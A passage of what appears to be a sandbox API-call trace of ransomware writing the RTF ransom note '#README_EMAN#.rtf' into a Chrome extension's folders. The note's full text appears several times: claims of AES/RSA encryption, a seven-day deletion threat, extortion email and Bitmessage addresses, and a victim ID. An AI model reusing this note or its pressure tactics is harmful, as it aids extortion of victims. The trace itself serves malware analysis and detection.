\\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.222] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.223] CloseHandle (hObject=0x2ec) returned 1 [0291.223] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0291.223] GetLastError () returned 0x2 [0291.223] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.224] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.224] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.224] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, 